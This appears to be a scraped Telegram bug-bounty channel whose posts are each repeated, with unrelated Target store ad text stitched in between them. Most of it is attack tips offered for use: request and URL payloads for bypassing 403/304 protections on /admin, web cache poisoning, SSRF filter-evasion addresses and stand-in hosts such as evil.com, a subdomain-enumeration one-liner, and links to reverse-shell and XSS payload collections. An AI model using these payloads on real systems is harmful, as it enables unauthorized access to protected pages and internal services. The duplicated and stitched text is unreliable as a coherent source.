Get Reverse Shell
Using Bash, Netcat(Window & Kali), Netcat(Without -e Option), Python, Perl, Php
Read For More
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet?source=post_page---------------------------
#cybersecurity #hacking #bugbounty #infosec #reverse_shell
Join My Telegram Group For More like This 🔥👍: https://t.me/bugbountyresources
Using Bash, Netcat(Window & Kali), Netcat(Without -e Option), Python, Perl, Php
Read For More
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet?source=post_page---------------------------
#cybersecurity #hacking #bugbounty #infosec #reverse_shell
Join My Telegram Group For More like This 🔥👍: https://t.me/bugbountyresources
❤1
Bypass 304 (Not Modified #bugbountytip
Request :
GET /admin HTTP/1.1
Host: http://target.com
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
➡Delete "If-None-Match" header
➡Adding random character in the end of "If-None-Match" header
Join Group For More:
https://t.me/bugbountyresources
#cybersecurity #hacking #bugbounty
Request :
GET /admin HTTP/1.1
Host: http://target.com
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
➡Delete "If-None-Match" header
➡Adding random character in the end of "If-None-Match" header
Join Group For More:
https://t.me/bugbountyresources
#cybersecurity #hacking #bugbounty
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
👍3
Security Hardening Guides🌵
Collection of awesome security hardening guides, best practices, checklists, benchmarks, tools and other resources.
Link :🔗
https://github.com/decalage2/awesome-security-hardening
Join Group For More:
https://t.me/bugbountyresources
#cybersecurity #hacking #bugbounty #bugbountytips #infosec
Collection of awesome security hardening guides, best practices, checklists, benchmarks, tools and other resources.
Link :🔗
https://github.com/decalage2/awesome-security-hardening
Join Group For More:
https://t.me/bugbountyresources
#cybersecurity #hacking #bugbounty #bugbountytips #infosec
🔥2
🎆Bypass 403🎆 #bugbountytips
🏹Using "X-Original-URL" header :
. . .
Request :
GET /admin HTTP/1.1
Host: http://target.com
Try this to bypass with
. . .
GET /anything HTTP/1.1
Host: http://target.com
X-Original-URL: /admin
🏹Appending %2e after the first slash
. . .
Request :
http://target.com/admin
=> 403
Try to Bypass with
. . .
http://target.com/%2e/admin
=> 200
🏹Try add dot (.) slash (/) and semicolon (;) in the URL
. . .
http://target.com/admin
=> 403
Try to Bypass with
. . .
http://target.com/secret/
. => 200
http://target.com//secret//
=> 200
http://target.com/./secret/
.. => 200
http://target.com/;/secret
=> 200
http://target.com//;//secret
=> 200
🏹Add "..;/" after the directory name
. . .
http://target.com/admin
=> 403
Try this to bypass using ..;/
http://target.com/admin..;/
=> 200
🏹Try to uppercase the alphabet in the url
. . .
http://target.com/admin
=> 403
Try with UPPERCASE :
http://target.com/aDmIN
=> 200
🏹Via Web Cache Poisoning
. . .
GET /anything HTTP/1.1
Host: http://victim.com
X-Original-URL: /admin
🏹Using "X-Original-URL" header :
. . .
Request :
GET /admin HTTP/1.1
Host: http://target.com
Try this to bypass with
. . .
GET /anything HTTP/1.1
Host: http://target.com
X-Original-URL: /admin
🏹Appending %2e after the first slash
. . .
Request :
http://target.com/admin
=> 403
Try to Bypass with
. . .
http://target.com/%2e/admin
=> 200
🏹Try add dot (.) slash (/) and semicolon (;) in the URL
. . .
http://target.com/admin
=> 403
Try to Bypass with
. . .
http://target.com/secret/
. => 200
http://target.com//secret//
=> 200
http://target.com/./secret/
.. => 200
http://target.com/;/secret
=> 200
http://target.com//;//secret
=> 200
🏹Add "..;/" after the directory name
. . .
http://target.com/admin
=> 403
Try this to bypass using ..;/
http://target.com/admin..;/
=> 200
🏹Try to uppercase the alphabet in the url
. . .
http://target.com/admin
=> 403
Try with UPPERCASE :
http://target.com/aDmIN
=> 200
🏹Via Web Cache Poisoning
. . .
GET /anything HTTP/1.1
Host: http://victim.com
X-Original-URL: /admin
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
👍4
Server Side Request Forgery(SSRF) #bugbounty #bugbountytips #infosec #cybersecurity
🏹Use The Whole IP Range For Testing SSRF (198.0.0.1-255)
🏹use Different Encoding Schemes of https://127.O.O.1
▪ Hex Encoding https://Ox7f.OxO.OxO.Ox1
▪ Octal Encoding https://0177.O.O.01
▪ Dword Encoding https://2130706433
▪ URL Encoding https://%6c%6f%63%61%6c%68%6f%73%74
▪ Mixed Encoding https://0177.O.O.Ox1
Also use 2130706433 or 0177øWWB1
🏹Obfuscate Strings In URL Encode or Case Transformation (Blocked Words Bypass)
🏹Use Registered Domain Names That Resolves To 127.0.0.1
🏹Embed Credentials : https://attacker@victim.com
🏹use URL Fragments '#' : https://attacker'#'victim.com (Remome the " over the hash)
🏹Use DNS Subdomain Method : https://victim.com.evil.com
🏹Use Directory Method : https://attacker.com/victim.com
🏹Exploit Redirecting The Target
🏹Change The Referrer To Burp Collaborator [Blind Exploit)
🏹Use IPv6 addresses instead of IPv4
🏹Usable Protocols:
▪gopher : //
▪file: //
▪dict://
🏹Use The Whole IP Range For Testing SSRF (198.0.0.1-255)
🏹use Different Encoding Schemes of https://127.O.O.1
▪ Hex Encoding https://Ox7f.OxO.OxO.Ox1
▪ Octal Encoding https://0177.O.O.01
▪ Dword Encoding https://2130706433
▪ URL Encoding https://%6c%6f%63%61%6c%68%6f%73%74
▪ Mixed Encoding https://0177.O.O.Ox1
Also use 2130706433 or 0177øWWB1
🏹Obfuscate Strings In URL Encode or Case Transformation (Blocked Words Bypass)
🏹Use Registered Domain Names That Resolves To 127.0.0.1
🏹Embed Credentials : https://attacker@victim.com
🏹use URL Fragments '#' : https://attacker'#'victim.com (Remome the " over the hash)
🏹Use DNS Subdomain Method : https://victim.com.evil.com
🏹Use Directory Method : https://attacker.com/victim.com
🏹Exploit Redirecting The Target
🏹Change The Referrer To Burp Collaborator [Blind Exploit)
🏹Use IPv6 addresses instead of IPv4
🏹Usable Protocols:
▪gopher : //
▪file: //
▪dict://
👍7
Find Subdomain from VirusTotal🔥
Bash One-liner 🌵#bugbountytips #infosec #bugbounty
curl -s "https ://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
Bash One-liner 🌵#bugbountytips #infosec #bugbounty
curl -s "https ://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
👍2
Web Application Security Mindmap🌱🔥
Download : 🌵
https://mindmeister.com/49183531/web-application-security?fullscreen=1
#bugbounty #bugbountytips #infosec
Download : 🌵
https://mindmeister.com/49183531/web-application-security?fullscreen=1
#bugbounty #bugbountytips #infosec
👍3
👍3
Categorized Web Application Testing🔥🤩
Download : https://2003700811-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M5x1LJiRQvXWpt04_ee%2F-M92gvt7GZ7vaA44ecsQ%2F-M92pwKmnNGTNqUWA0Fd%2Fy7ipicwvp5d41%5B1%5D.png?alt=media&token=155127c6-f54c-464d-9b78-ed90f7070e03
#bugbounty #infosec #cybersecurity
Download : https://2003700811-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M5x1LJiRQvXWpt04_ee%2F-M92gvt7GZ7vaA44ecsQ%2F-M92pwKmnNGTNqUWA0Fd%2Fy7ipicwvp5d41%5B1%5D.png?alt=media&token=155127c6-f54c-464d-9b78-ed90f7070e03
#bugbounty #infosec #cybersecurity
❤2👍1
🔥🌵😲8000+ Xss Payloads🌵😲🔥
#bugbounty #infosec
Git ripo : https://github.com/Aacle/xss_payload
#bugbounty #infosec
#bugbounty #infosec
Git ripo : https://github.com/Aacle/xss_payload
#bugbounty #infosec
👌3🔥1
Web Cache Poisoning🌱🌵🔥
#bugbounty #infosec
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.
Where to find 🧵(1/n) :👇 Complete Thread
https://twitter.com/Aacle_/status/1588199064780537856?s=20&t=G9tW-LmTpkn9SteflrprpQ
#bugbounty #infosec
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.
Where to find 🧵(1/n) :👇 Complete Thread
https://twitter.com/Aacle_/status/1588199064780537856?s=20&t=G9tW-LmTpkn9SteflrprpQ
👍6